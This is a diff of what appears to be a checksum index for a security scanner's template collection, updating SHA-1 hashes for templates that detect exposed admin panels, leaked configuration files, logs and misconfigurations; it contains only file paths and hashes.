http/exposed-panels/hashicorp-consul-webgui.yaml:b15082211143beddea0e26bd2fa3de19a918369f http/exposed-panels/hestia-panel.yaml:1d7f9bb66a91637fe31767825865138d6cfb4bd1 http/exposed-panels/highmail-admin-panel.yaml:51b8d208dc75f09f36489a9ebf7e51195520f9ce @@ -2853,14 +2853,14 @@ http/exposed-panels/kfm/kfm-login-panel.yaml:dfc8946bf49cc073d7f2d1b75c3d11d5150 http/exposed-panels/kibana-panel.yaml:ec5745717caad3e5e3b1e56eefa76ac9662ba327 http/exposed-panels/kiwitcms-login.yaml:4d5aceeef783c0fa5d067083e3293336fa74a345 http/exposed-panels/kkfileview-panel.yaml:b0bb9285350ad86824e90e867c8e48c85b84835e -http/exposed-panels/konga-panel.yaml:0afbf2b057ba88f59277754794f653ec04d5d40d +http/exposed-panels/konga-panel.yaml:6c54dc040817cf78988c960713b310c9ca71938e http/exposed-panels/kraken-cluster-monitoring.yaml:d41244aae538af19e677aa6f243fff1a01b6766d http/exposed-panels/kronos-workforce-central.yaml:0783ab0b1d33ecbe42ef5632f8bb69ef94890cca http/exposed-panels/kubernetes-dashboard.yaml:70774e6ff8b7a27744245d176cde742d6b07f701 -http/exposed-panels/kubernetes-enterprise-manager.yaml:c4760462d613b677dbce6f290ba2d497e9ed6ffd -http/exposed-panels/kubernetes-mirantis.yaml:a7c2800bad95565f3fd89578749e21677d157f85 +http/exposed-panels/kubernetes-enterprise-manager.yaml:67e7043ff0d6c124ccada6416a064fc051ae284e +http/exposed-panels/kubernetes-mirantis.yaml:f5cb6db20ec10ad3aaa00f452a245306a390c31d http/exposed-panels/kubernetes-web-view.yaml:793d2abfff5b3ace93778ecf5da58783b5a66c83 -http/exposed-panels/kubeview-dashboard.yaml:b4e6293e012e9750656f3da75d35681979221f10 +http/exposed-panels/kubeview-dashboard.yaml:414f6ff03dab6403277937bd73b137d545c8a4da http/exposed-panels/labkey-server-login.yaml:af4be5b93511949dee4009f03c21fcfd70d970d8 http/exposed-panels/labtech-panel.yaml:e7e6d6799d556c0ef0ee447be405e31d8236e445 http/exposed-panels/lacie-panel.yaml:8da28ad6997282977c86178c8a10a5298ce3776e @@ -2890,13 +2890,13 @@ http/exposed-panels/machform-admin-panel.yaml:2666dcda409a0ec90962a2143b3ba20266 http/exposed-panels/maestro-login-panel.yaml:481c29a3ca12efccaa0ea758de239bfd5bdad187 http/exposed-panels/mag-dashboard-panel.yaml:a981de9120e06988df4bde608a9696228c19d06f http/exposed-panels/magento-admin-panel.yaml:6de98dd07bb3171f43866a912dbb066a923d3744 -http/exposed-panels/magento-downloader-panel.yaml:c44a4e7ce042cd3e32e8c95ec4e2f487a362b82d +http/exposed-panels/magento-downloader-panel.yaml:ad54656996c291cb1d27fb5b9f0586afa4acc549 http/exposed-panels/magnolia-panel.yaml:cf54de815884f9bec31455217096c54a0cfbe03c http/exposed-panels/mailhog-panel.yaml:f8b76a1c78cb9918d1afeb6eaa3572bf7711199c http/exposed-panels/mailwatch-login.yaml:d521f395baf43625ff6062f53371b0527385b0f6 http/exposed-panels/mantisbt-panel.yaml:fd9955feea4d45764389eee8c881ffb159f5fa1c http/exposed-panels/matomo-login-portal.yaml:8b90263221ca1a43a7b595469283828c3a3e7be9 -http/exposed-panels/mautic-crm-panel.yaml:d6d009730c4d90630f9942fbddab7bf86cd6ed46 +http/exposed-panels/mautic-crm-panel.yaml:075fd48742c0a2da24750d8b178b708ebf077252 http/exposed-panels/meshcentral-login.yaml:3508dc05377d9ea80d5eedc0fa725beb5d3f9279 http/exposed-panels/metabase-panel.yaml:c8dfa427d7c63dd7de83ee2d65aece5b341fe783 http/exposed-panels/metasploit-setup-page.yaml:91888e18de26aa01d904a794a0beef59614df507 @@ -2933,7 +2933,7 @@ http/exposed-panels/nagios-xi-panel.yaml:25ea79e88d30d1ca8f3ef37fa994ebd98feca68 http/exposed-panels/nagvis-panel.yaml:8c31929a520b967563b2575f4c61f501acb6ac9a http/exposed-panels/ncentral-panel.yaml:09fc9fd2dd53bb380785ffaab63d061518f0e9a9 http/exposed-panels/nconf-panel.yaml:953456b5f4d23cdf8ce2071f116a9cb845c7c2ad -http/exposed-panels/neo4j-browser.yaml:d866637f6bf40f223d66bd09b534e7541552eedc +http/exposed-panels/neo4j-browser.yaml:13e3ad6b07ff9b0afab6655ee80ad22bc3e3f2aa http/exposed-panels/neobox-panel.yaml:3256c2b2449ab3ec555e3705de014eb8a537c6ee http/exposed-panels/neos-panel.yaml:ad35cd51e1f83f7739a6563d42ccb7c18971074a http/exposed-panels/nessus-panel.yaml:b9c6bc211c2078c3c33f22b49adad73ef4e95fbb @@ -2997,7 +2997,7 @@ http/exposed-panels/openvpn-connect.yaml:bcf164655d7ee968dd4ab49e1e9cf2ea24ed4a0 http/exposed-panels/openvpn-monitor.yaml:aca07928a017d2a81118d62ad6c30ae494376523 http/exposed-panels/openvpn-router-management.yaml:f054397ab750c4dd436ea9005c8f6eea37f61602 http/exposed-panels/openvz-web-login.yaml:a3819669a6fdd6210099ace19cfbc95704a18746 -http/exposed-panels/openwrt-login.yaml:5e62397d790861e924e684fe578993a3de7c6e73 +http/exposed-panels/openwrt-login.yaml:a11caf3db340dcf20e08e82f25e3c080e317875b http/exposed-panels/openx-panel.yaml:4d4678d2709c186159102ac3b30b777483899101 http/exposed-panels/oracle-business-control.yaml:ef8a337cd773ac3ac3c065c9d3574794543cd72b http/exposed-panels/oracle-business-intelligence.yaml:469a37bfb16dc8f34dcfdb206cd652e1ae7c2768 @@ -3021,7 +3021,7 @@ http/exposed-panels/parallels/parallels-hsphere-detect.yaml:9c647cc33b49bc5ed755 http/exposed-panels/parallels-html-client.yaml:e4aa042070fcc50ebe395c0215678db1636af416 http/exposed-panels/parse-dashboard.yaml:9eb384fbc29bba21fd823b657596df3c821750d0 http/exposed-panels/payroll-management-system-panel.yaml:62fc62cd5f6b8328759aed653f3c97394b526d02 -http/exposed-panels/pdi-device-page.yaml:1344932df725c847d564e1cbe501be1889dd90b6 +http/exposed-panels/pdi-device-page.yaml:a164dbe4e81fda0859b8fc136b6f7108cb3cf722 http/exposed-panels/pega-web-panel.yaml:5c2cf7ee14ef7e5f626007f807e81afc71f9ea6e http/exposed-panels/pentaho-panel.yaml:3349ae99a2ef60a21243fb95543ccae8edd1ae84 http/exposed-panels/persis-panel.yaml:a7431b703bd9eb1c632e59f32a2ff5de09973309 @@ -3059,7 +3059,7 @@ http/exposed-panels/pulsar-admin-console.yaml:a09657de381c143ef15246feff5381e17a http/exposed-panels/pulsar-adminui-panel.yaml:231f2e02600d1679fa324839adc669e105f44f40 http/exposed-panels/pulsar360-admin-panel.yaml:26a7c693e6a0dd3d45bfe5928943755cd8b80820 http/exposed-panels/pulse-secure-panel.yaml:9cc51602b35429af2533e13248a900c0c879fc6b -http/exposed-panels/pulse-secure-version.yaml:4dc70b712686502d47ee2789bf1e648b856d52f8 +http/exposed-panels/pulse-secure-version.yaml:77ac5bf94d0b539ba09abf06531bdc951dcd1f0a http/exposed-panels/puppetboard-panel.yaml:17ab5a2d4d72030cf9cf10dd9b20c4b4978ca71d http/exposed-panels/pure-storage-login.yaml:35dccafc9cfc461c0980989a63d6e2ccb2aad648 http/exposed-panels/pypicloud-panel.yaml:8c3757096a820328509f7e9cd3bd4a88b82acbdc @@ -3091,7 +3091,7 @@ http/exposed-panels/retool-login.yaml:3927f2181acae2036ddda8b3c3c9677a85bad02c http/exposed-panels/riseup-panel.yaml:ec1b4f8a97935e9f07573ae2afedc5f42dab2e4f http/exposed-panels/rocketmq-console-exposure.yaml:66f29bdaf32fb452c16b33a5abe616168269b774 http/exposed-panels/room-alert-detect.yaml:1c7ad07f6a232b872b0ea056a24fd516c9624746 -http/exposed-panels/roxy-fileman.yaml:9e0375d9ecec96659f90cdd7c72fa4141dda6ac1 +http/exposed-panels/roxy-fileman.yaml:cd176981065e134f36ece799e188f37843f1fd1c http/exposed-panels/royalevent-management-panel.yaml:b1db82600d565632070dfbf431119ac429627286 http/exposed-panels/rsa-self-service.yaml:c5e5e691f65131c9341ef41c7696fb6f32dc427c http/exposed-panels/rstudio-detect.yaml:c605c06308bd5e24576d555ea6129e88187d38b8 @@ -3201,7 +3201,7 @@ http/exposed-panels/synapse-mobility-panel.yaml:f41ec14f15af49fe67218ecda8ec11a4 http/exposed-panels/syncserver-panel.yaml:1b8457c7d6b0c683683afa3757c8d0df244d1963 http/exposed-panels/syncthru-web-service.yaml:02bb50ccaf5240c2b82962554d8f608b9bd5e0bd http/exposed-panels/synnefo-admin-panel.yaml:f74be29a50a186f60c3cb8ba3957ba38f6356865 -http/exposed-panels/synology-rackstation-login.yaml:04f9bfcd16e0d8a943afc51fef7e77c703b25864 +http/exposed-panels/synology-rackstation-login.yaml:e87cb07d9c8a956e78871fbefa7a1f99dad0f46f http/exposed-panels/synopsys-coverity-panel.yaml:52abd20a94b9afe64ad254668280fc99c64e7d7c http/exposed-panels/sysaid-panel.yaml:b1c84f8719f596ff14ad4179a0228b12f22d67d9 http/exposed-panels/tableau-panel.yaml:44e254a879a3359f3640d422ea1ead714978698f @@ -3227,7 +3227,7 @@ http/exposed-panels/thruk-login.yaml:b1229321f3aebb8e1e5b8bc9b8f52d725b7decf8 http/exposed-panels/tigase-xmpp-server.yaml:e4c6b531888b16163c4ae94a75e1e7707b01def3 http/exposed-panels/tikiwiki-cms.yaml:4ac7291f0fff08fe63b022728630d255357a4b44 http/exposed-panels/tiny-file-manager.yaml:e9a738a44602a4ffaf3c0085184365711870d400 -http/exposed-panels/tomcat/tomcat-exposed-docs.yaml:4fd8a7b1a7c79d104d7f8ff976115c7d38bb1016 +http/exposed-panels/tomcat/tomcat-exposed-docs.yaml:d1ecf9592fab3e18759e2002e77d186c8c960673 http/exposed-panels/tooljet-panel.yaml:8d7780894fcfd25ab72c22cede7cf46c5142b257 http/exposed-panels/total-web-solutions-panel.yaml:e0437ab8575c0fe34d16ee883c669a7e6979cc7f http/exposed-panels/totemomail-panel.yaml:bd4a8e21b5f88bc1dc7d8f8d2c04e828c20e701e @@ -3235,7 +3235,7 @@ http/exposed-panels/tracer-sc-login.yaml:f2488682bd1645443b5c815d1cdbed4d5bc16a5 http/exposed-panels/traefik-dashboard.yaml:b185cd338488c0024b5db23bc3afe3ace7af4176 http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml:3e401f83250d3461e5bf1c1142afdd1468d5d219 http/exposed-panels/tufin-securetrack-login.yaml:cdb189908931aded54acb7db492bfbe5215fecc5 -http/exposed-panels/tup-openframe.yaml:d42bcab5f6c73f7ad2465d8e3143ed982bdcfa54 +http/exposed-panels/tup-openframe.yaml:fc5e706960c604dfff0f2a9cd352fa8c81fdb7c6 http/exposed-panels/turnkey-openvpn.yaml:0396472972fce09f9cbdf2ea3ad1168c686898cb http/exposed-panels/tuxedo-connected-controller.yaml:9d7aa611b6051c2aabfcdd0d5ef9edafc2cb056c http/exposed-panels/typo3-login.yaml:0cda49b46ede824921c64adb6f9a1720e2480d5f @@ -3348,14 +3348,14 @@ http/exposed-panels/zoneminder-login.yaml:ac848c25aa3074ceab4dd7cdf87a55e311812c http/exposed-panels/zte-panel.yaml:753e5b08d8e4d00661a11c90359d865d4577f1ee http/exposed-panels/zuul-panel.yaml:f5f66a94a6622b6fb31e082db563675b20a974ce http/exposed-panels/zyxel/zyxel-firewall-panel.yaml:1c5a9b0e27af0f701193dc53bff7f9f009be85b2 -http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml:3545869a43400918facdaddde5b8caae94b3f582 -http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml:35fb29e042415a8f08217ff2dc91707f6d180171 +http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml:bd74743014fe5adaa76abadb0d113d409ad0b6aa +http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml:06a2d279e8914aa79666fd4f223bfd49e78e5560 http/exposed-panels/zyxel-router-panel.yaml:ae6e8ef2361d2976ab338b156e857fa944dba4a0 http/exposures/apis/couchbase-buckets-api.yaml:cbb41a24a81bcec180a69d2c30ebdb9de97513b9 http/exposures/apis/drupal-jsonapi-user-listing.yaml:c7b8ab5819a8c8c516bb9897695190bf33b62dbc http/exposures/apis/jeecg-boot-swagger.yaml:dc3fcfe73d3514b2d0a164fdf65ac60d72b35929 http/exposures/apis/openapi.yaml:411d1b7c30b8150edeb47b6e68b99ee97f211ca1 -http/exposures/apis/strapi-page.yaml:9e3c0643b12a045247a1535e141fa4218ed54165 +http/exposures/apis/strapi-page.yaml:e9df6ee5097d3e8d8e2c17d5d9ef63339400b4d5 http/exposures/apis/swagger-api.yaml:032bb08dbd5e4d6f303e861e960ba0714b0e261e http/exposures/apis/wadl-api.yaml:f07f4ce36505a6b991361f0f2d641f19eced1de7 http/exposures/apis/wsdl-api.yaml:d5879ee63561edeeef160c76f97d20e8bbc3fd29 @@ -3377,7 +3377,7 @@ http/exposures/configs/aws-config.yaml:70efea99a4687b9ad02505f5c4504b39c8bc4fa4 http/exposures/configs/aws-credentials.yaml:508b331520250241fc2f11838af6959d93090215 http/exposures/configs/awstats-config.yaml:5a4480c1065caa06ae267b4f43a1d99b7281faa1 http/exposures/configs/awstats-script.yaml:417e4118f9cff4be479a1d72a8c1b843b177116c -http/exposures/configs/azure-domain-tenant.yaml:4221ba578d2d90e3043b954efed08f2a862851d6 +http/exposures/configs/azure-domain-tenant.yaml:84637a1c81e0eb07ff7de0f55a9a53240e38811d http/exposures/configs/babel-config-exposure.yaml:2b8bfc15b4c07394b9db8e5816e95dd5cb0150cb http/exposures/configs/behat-config.yaml:83ee299a64604a8adfc5ef857b49236a0dfd0686 http/exposures/configs/blazor-boot.yaml:a93185295bf759ac9503e84915277ae1bf0f02cc @@ -3402,7 +3402,7 @@ http/exposures/configs/django-variables-exposed.yaml:0a66a40d16169d33baed3325a39 http/exposures/configs/docker-compose-config.yaml:bd7c52fb2ca471be1778163d469a60d3a549d368 http/exposures/configs/dockerfile-hidden-disclosure.yaml:4d9094b445a30d80e810d3e9d2dde5179ab78949 http/exposures/configs/editor-exposure.yaml:85d65663018c78053312ec8c42d8f0b7708217fe -http/exposures/configs/esmtprc-config.yaml:dbd070e50e6ecdc1bf24fa13d1a70a6ca8a308f3 +http/exposures/configs/esmtprc-config.yaml:7a8cb8e61b90b1cfd0a387f166bd3c802750c7f8 http/exposures/configs/exposed-authentication-asmx.yaml:517aad203d4a53a48e73f053f14919131d7ea187 http/exposures/configs/exposed-bitkeeper.yaml:71882f110d56ef12975a0b1599c31f9611480183 http/exposures/configs/exposed-bzr.yaml:c0a4321009ba24319689a8020e6b2957bb5f34c1 @@ -3430,10 +3430,10 @@ http/exposures/configs/htpasswd-detection.yaml:b677719d94454897acc1453c0a63b9f83 http/exposures/configs/httpd-config.yaml:338924fba6e1e94d1489e7c59e76ef36d121c139 http/exposures/configs/javascript-env.yaml:6eed3f19aa879fd9c05e12d969cf47aae8b954a9 http/exposures/configs/jetbrains-datasources.yaml:da58a71baf645e0fb838835cf7d578c2479c5cde -http/exposures/configs/jkstatus-manager.yaml:f68aafd53dcc1a226d690c69a7d776622ef1278f +http/exposures/configs/jkstatus-manager.yaml:704e95f4b9eb8c89cd2d810a63fb22e46da47fb3 http/exposures/configs/joomla-config-file.yaml:8535eef26cf36993bd53f6d0699f53a9d7a2c3cf http/exposures/configs/karma-config-js.yaml:a08010314d86f1ffa8a650d775e376220fb2e4eb -http/exposures/configs/keycloak-openid-config.yaml:38150de67170e7d3fa481e7e5cef51a403cb28d9 +http/exposures/configs/keycloak-openid-config.yaml:a5d7a8f2a30e683b092e019c80daa9521827285e http/exposures/configs/kubernetes-kustomization-disclosure.yaml:b1048959a12117a9fc76a9f264ed7a871d15ef96 http/exposures/configs/kyan-credential-exposure.yaml:4fd7eadf3dd175c87372cc4ee81d371688089041 http/exposures/configs/laravel-env.yaml:4407facf2b242affa0211f195ed0368018c1a7e5 @@ -3471,7 +3471,7 @@ http/exposures/configs/qdpm-info-leak.yaml:ef4de0b835a512a414ba2901ad71531747c33 http/exposures/configs/rackup-config-ru.yaml:64ee636bcfef76a3909e71bcd06aef684a4d3ecc http/exposures/configs/rails-database-config.yaml:ada6fbd81e6254a7a22c571c40c5371410c8b17e http/exposures/configs/redis-config.yaml:18ed607422185fd9a16442f42ba58aba8abdfcff -http/exposures/configs/robomongo-credential.yaml:e3e3104ddbbb50dd0c4fa8997f54650e3ca32e1e +http/exposures/configs/robomongo-credential.yaml:42a29fabfe1dc873473ef6bb6a7abbf4970bae52 http/exposures/configs/rollup-js-config.yaml:5f05670003f225115fe7ad6b3972e601bded8c14 http/exposures/configs/rubocop-config.yaml:384e0ea0f0c27d0af2c6e5a50c401a2c13dc93aa http/exposures/configs/ruijie-information-disclosure.yaml:fdb1fa94e47d4a6ff82906a468936ec7c4a7bdb2 @@ -3499,7 +3499,7 @@ http/exposures/configs/web-config.yaml:85436bb4e05f103e4c461f4121bf01ebeb93560b http/exposures/configs/webpack-config.yaml:c2b9ec44a78f20335a069ab8dced9c6ad7cc5915 http/exposures/configs/websheets-config.yaml:6cc7715a9dd5c40399ef27a0d672a864c005f14c http/exposures/configs/wgetrc-config.yaml:f60e6efb6c798cdc9b59d2ca00039532dd65bfdc -http/exposures/configs/wpconfig-aws-keys.yaml:63f7bc958e8476bc77c175af89470af8aff1d1ea +http/exposures/configs/wpconfig-aws-keys.yaml:c4567e9e88fbf8943da87a940ed08f68068862e7 http/exposures/configs/xprober-service.yaml:8326b0cfdff824ce5011be19fc182591d32b22cb http/exposures/configs/yii-debugger.yaml:df04d0782fb0ca3d1e70b41ab4dfa6ed2bb58c5b http/exposures/configs/zend-config-file.yaml:235fe5cbca2df7baa9614b171ed295d6d25f9f17 @@ -3544,11 +3544,11 @@ http/exposures/files/glpi-status-ldap-domain-disclosure.yaml:4d6b2ea08c3df740e95 http/exposures/files/go-mod-disclosure.yaml:76882063ca77a7aee156c86d0c1ef72d185ba0f4 http/exposures/files/google-api-private-key.yaml:4c859963629baa8b8a3649459bdb2109e7a82468 http/exposures/files/google-services-json.yaml:ed9c26ec97c976423a6cedb65601a54cb2d4e0c1 -http/exposures/files/gradle-libs.yaml:3929185dc3c88c86d935230ba4a27b4b3f61c035 +http/exposures/files/gradle-libs.yaml:b4b2a4b963e282c0502a62612ca2aa4ea602ffa9 http/exposures/files/iceflow-vpn-disclosure.yaml:b346f9530fa685b97977dbbdd471c52d412daf12 http/exposures/files/idea-folder-exposure.yaml:8a24ab26c9204e1621db28f9f4cc14b05eeb201f http/exposures/files/ioncube-loader-wizard.yaml:f67883db04619cf131c67cea5ad5fa36ee264817 -http/exposures/files/jetbrains-webservers.yaml:5ce499cf5024d4db300056febaf7b391f92ea176 +http/exposures/files/jetbrains-webservers.yaml:ebc55d71ee5ce170f8a0954cc4d4a2c5fc8803b6 http/exposures/files/joomla-file-listing.yaml:6d73e4f3d891e71308b858ba586e8dbfa86cbb6f http/exposures/files/jsapi-ticket-json.yaml:a8e5a1ec4fe52c8a5327953552086519ed540e32 http/exposures/files/keycloak-json.yaml:38e130dc218f63f7aa2ccbcf0bfc384d47f10735 @@ -3575,15 +3575,15 @@ http/exposures/files/rails-secret-token-disclosure.yaml:af2d34def00188d0a62512c1 http/exposures/files/reactapp-env-js.yaml:24a242fcd9e3f7cc791532d80184737653dceaaf http/exposures/files/readme-md.yaml:5210c501f1fab2404caa225dfddb15ec09d3a771 http/exposures/files/redmine-config.yaml:aaefbcf8521329ceb3355d8250c28938d9c0da99 -http/exposures/files/redmine-settings.yaml:da37ae4e779155e6ec3a7dc3d969044ad97ddb21 +http/exposures/files/redmine-settings.yaml:ea13cee96c9f92ec8d522dda3ba090a4e1e56343 http/exposures/files/routes-ini.yaml:792bc336f53f2480b44f8468cdbf8f2d94b8e2fb http/exposures/files/ruby-rail-storage.yaml:b11a1c33dba1f717503cccf6e1fb371905d792a1 http/exposures/files/salesforce-credentials.yaml:2d1ceddc3c75e8a90eb2c8413b10abe58b07955d http/exposures/files/sass-lint.yaml:30d878e3167601f6648d067978c16e0ce9958bba http/exposures/files/secret-token-rb.yaml:3c27f9d052bc1580b17d66eaacc35c5487f0fafc -http/exposures/files/secrets-file.yaml:dce81c5455e15e9d62ee2125b6ddeae22f33b4d8 +http/exposures/files/secrets-file.yaml:25722121aaa20694593b6b77fc32e941cf63f6e1 http/exposures/files/sendgrid-env.yaml:121c0cbb1ad1c1d295a516a2962b9809554025a7 -http/exposures/files/sensitive-storage-exposure.yaml:86416601e39918f62893d883aa50e3b8086078e1 +http/exposures/files/sensitive-storage-exposure.yaml:298b464e86ed13e8fdd49cf71676088a7b5a7ec7 http/exposures/files/service-account-credentials.yaml:3e3a06a18bed6e7310a60b9c31a0a1b1ce0b693c http/exposures/files/shellscripts.yaml:9c1b07550699aa6950f6ef7ddffde953a6c1608d http/exposures/files/snyk-ignore-file-disclosure.yaml:1617a8d58cd0e67476ca0c5fe856b5d8acef7db5 @@ -3606,9 +3606,9 @@ http/exposures/files/wp-cli-exposure.yaml:04a4282c2a694a0e024f78da5d78dcc81d47cf http/exposures/files/ws-ftp-ini.yaml:63e0a7bce8ef6aa82466e9cc843350f46c49817b http/exposures/files/xampp-environment-variables.yaml:0c3970725b254884aa036c9af32c4da79d8415df http/exposures/files/yarn-lock.yaml:2819096cfa528b2134d1daa628c69c052087c99b -http/exposures/logs/access-log.yaml:efe88cc08756131f74d366687f3abc7f9fd43afa +http/exposures/logs/access-log.yaml:e57d9ce5b1f26ef00fa31c89e2d540995c3f7e26 http/exposures/logs/badarg-log.yaml:77810a7944c58fca1f01d742135b365bab8168bb -http/exposures/logs/clockwork-php-page.yaml:ed0acbf7b9996028ffab123b4b811f71f8c013f6 +http/exposures/logs/clockwork-php-page.yaml:28267b1a0c73ade5080473c934d997b3695c92a7 http/exposures/logs/darkstat-detect.yaml:f1b2cc139ac3b559b0357ce10ca48816e5e079f7 http/exposures/logs/development-logs.yaml:052d868cd877406563e4b5fc4814c57b9bec84d4 http/exposures/logs/django-debug-exposure.yaml:2811466c86e5fbe450b7fa0d1ffa5fd2d259e9b4 @@ -3625,7 +3625,7 @@ http/exposures/logs/git-logs-exposure.yaml:d180000f3f9fc799e07902d4605025656e7b2 http/exposures/logs/idea-logs-exposure.yaml:9ad9127612dabb6a98aae8a7ac7a5ef018844c86 http/exposures/logs/jboss-seam-debug-page.yaml:2eef84506c6c637325bb1e98795034cfd021457a http/exposures/logs/laravel-log-file.yaml:092625e049e3d6080295817170eb1174836bc73a -http/exposures/logs/laravel-telescope.yaml:9596f29365907fb4ceade05d4cb31a3b8616805d +http/exposures/logs/laravel-telescope.yaml:41bd5e421cbb48c2886f7596d7013fcce8c7aa1b http/exposures/logs/lucee-stack-trace.yaml:647c4f9866a08efd7e0374b8102ed809fa1cc297 http/exposures/logs/nginx-shards.yaml:b260d2f517de81a596bd6ccb59c138d737b867ff http/exposures/logs/npm-debug-log.yaml:27ef7697ce31ba0fedef3185111e03c263ad270c @@ -3788,7 +3788,7 @@ http/iot/panasonic-network-management.yaml:dc528e5d6cdc64bbe89e2810911f68c859ca5 http/iot/pqube-power-analyzers.yaml:c54066074ac665b9dfe0bbce92ca2abe8c20be05 http/iot/qvisdvr-deserialization-rce.yaml:a5375894aa663226cc01b155b7bbfb59e8dc094a http/iot/raspberry-shake-config.yaml:ba160d26e7378dbd2336e413ba81476c9b48341d -http/iot/routeros-login.yaml:25fd747e2e42fd9ab9af2866a3d4cab14eda28c3 +http/iot/routeros-login.yaml:12a33d80ea9342913b718245785d61e1b53b8cb6 http/iot/selea-ip-camera.yaml:de2919543690b0141c6274cd17ef488a48cf4dd4 http/iot/snapdrop-detect.yaml:ad8a0782d3a0e6f2c69a3c28e0e17eef57f9a9ec http/iot/stem-audio-table-private-keys.yaml:5998144b17dd026c2ff2d3bb0f7b17c9b1942d94 @@ -3802,13 +3802,13 @@ http/iot/xp-webcam.yaml:6a17a29da87ffe3b4a382c6ed2e4ca38c148e54e http/iot/zebra-printer-detect.yaml:3ac7d5f177a91a5ee89411ead8e073a72a10997e http/miscellaneous/addeventlistener-detect.yaml:49f913e72df50e18eb80458c9fbb5df10d4253b6 http/miscellaneous/apple-app-site-association.yaml:c6da929223cda667179226cfba083fc9692c7dac -http/miscellaneous/aws-ecs-container-agent-tasks.yaml:169fca1a43acbc9c877b9c0c3df0141f2400d67e +http/miscellaneous/aws-ecs-container-agent-tasks.yaml:e19643775ad6c43b074bc8773f31dce3dba3fd05 http/miscellaneous/clientaccesspolicy.yaml:d2ebcdf18a9e115d28ec5418618dde3de28439b6 http/miscellaneous/crypto-mining-malware.yaml:5bb7d4b571266f921448d0d25bfbb059425c62fe http/miscellaneous/detect-dns-over-https.yaml:a0d05c1d3526c2368d9957b37ab44f6177772f8b http/miscellaneous/dir-listing.yaml:397e6f739d91d1935d49bdd18bb899b4072efcdd http/miscellaneous/email-extractor.yaml:e7e0fbbf86d8e36a15315fc86ac242166a0be63a -http/miscellaneous/exposed-file-upload-form.yaml:ac60116640ef25b98810a4643bdd92020bfee1f4 +http/miscellaneous/exposed-file-upload-form.yaml:a4f614f98d52580d17d2c755bd2b045cf3a0a86d http/miscellaneous/firebase-database-extractor.yaml:0c276fddfc49fdf19983f9ce36b40351af0aec57 http/miscellaneous/google-floc-disabled.yaml:b741fb4fc11cff0f2c861f961a8bfff633e05196 http/miscellaneous/gpc-json.yaml:994f54409ea33bd6173cafd61e47f5c7bd0a807b @@ -3816,9 +3816,9 @@ http/miscellaneous/htaccess-config.yaml:6303070fdb7947f0a454fb705febf90e5f8e498a http/miscellaneous/http-trace.yaml:fb4ed5a7e06bf82926a3ee0fc03ec3892e51f686 http/miscellaneous/joomla-htaccess.yaml:7161e4a0758ca3e02b231125c7aa30348e72c9f0 http/miscellaneous/joomla-manifest-file.yaml:436522a1656ec67d5cebd0d3fbd8676560935b1d -http/miscellaneous/microsoft-azure-error.yaml:26004b001aeb9b8a337507daabc8f50e05bc3859 +http/miscellaneous/microsoft-azure-error.yaml:7659a1102c8a524428c421708aec277a3a6e49f4 http/miscellaneous/moodle-changelog.yaml:2f5b4e81305c21b277d6f54fb002ea044eff500a -http/miscellaneous/netflix-conductor-version.yaml:41a8f2d27ee7782b5df49c6305bc5bdc17a545af +http/miscellaneous/netflix-conductor-version.yaml:58e842f74840a188b1d01b220162deded54cbb20 http/miscellaneous/ntlm-directories.yaml:f5c3bab9fa3ac6238150af38b7c142e5bb4fd951 http/miscellaneous/old-copyright.yaml:82716187f88f1fcdef6264e04960f0dad37a90d6 http/miscellaneous/options-method.yaml:99929d85d875946d3debe94d08fcaeb41548d629 @@ -3829,124 +3829,124 @@ http/miscellaneous/sitemap-detect.yaml:896df94a32924657fe3dafc7dbe4ac63e7c7f7bb http/miscellaneous/x-recruiting-header.yaml:80823f643deba3532ed2ef4f1c735239cc6ede13 http/miscellaneous/xml-schema-detect.yaml:b872ff3f34ecb006eda8c630f1bfb9d313f54ace http/misconfiguration/ace-admin-dashboard.yaml:47e7319f4a226963e64b1fc834319aaa627f8268 -http/misconfiguration/adobe/adobe-connect-username-exposure.yaml:5249db2aea201d5d7ba9c3c4c351e90ea739b3f2 -http/misconfiguration/adobe/adobe-connect-version.yaml:f991a4a0eea40cfec2529b9f722476e376ec7ca2 +http/misconfiguration/adobe/adobe-connect-username-exposure.yaml:56f148e0c564d093348ba4c601d0e122e3f564dc +http/misconfiguration/adobe/adobe-connect-version.yaml:62a18a3b57374a6c0035426b455185fd674c172c http/misconfiguration/aem/aem-acs-common.yaml:861ad8ab0564178399ca44ac6cf6ec4f173dbb72 -http/misconfiguration/aem/aem-bg-servlet.yaml:e8034484821912b1578427e34ec182fe9540f05b +http/misconfiguration/aem/aem-bg-servlet.yaml:9cc55a653b7d96eeaa453b1020d64c0e399f2dad http/misconfiguration/aem/aem-bulkeditor.yaml:9458afe30af20cafecc274657b5b28376882cbe5 -http/misconfiguration/aem/aem-cached-pages.yaml:b890879b10463cb45b4a184abef46f09c57530c2 -http/misconfiguration/aem/aem-childrenlist-xss.yaml:0de323325ddb206336dc42faae7fe284e62ec1e7 +http/misconfiguration/aem/aem-cached-pages.yaml:378f9590b8bf896b09d6b20bcff19fe117f24cf2 +http/misconfiguration/aem/aem-childrenlist-xss.yaml:865e9155cd7b13675736e59497f7ac8dbbd21983 http/misconfiguration/aem/aem-crx-browser.yaml:8d0d989f661a8a9cfa5b968ea8a3cfd630a833eb -http/misconfiguration/aem/aem-crx-bypass.yaml:3370197893ec4b3db848a7cbbde74874a0289556 -http/misconfiguration/aem/aem-crx-namespace.yaml:a4cc03fd5a483f2cbc49ff40841dd08750a2d40b +http/misconfiguration/aem/aem-crx-bypass.yaml:488da8bd56ec9510905feebdb639a63f0882a1b6 +http/misconfiguration/aem/aem-crx-namespace.yaml:5ff1ce56cd96263d699e32c082fc96dbc45b240b http/misconfiguration/aem/aem-crx-search.yaml:a1c33c2ccc5e4b2231ae3ca690ac8c7de4a1fab9 http/misconfiguration/aem/aem-custom-script.yaml:b6e5682abaa0a8520155f9bd276fa1116ec263d7 http/misconfiguration/aem/aem-debugging-libraries.yaml:072192ffe24cf41b7cb09bbb23039c2172b7870d -http/misconfiguration/aem/aem-default-get-servlet.yaml:27f7fcfdebbec765977d34f97ebefcade908b2a3 +http/misconfiguration/aem/aem-default-get-servlet.yaml:96696f1b73dc2b544727de4715b381091b2d56c4 http/misconfiguration/aem/aem-disk-usage.yaml:c14fd76c7215264ecd2191fb145008d2b6eec2d9 http/misconfiguration/aem/aem-dump-contentnode.yaml:033ad37803e934d4baa6db23bc685dacf227692b 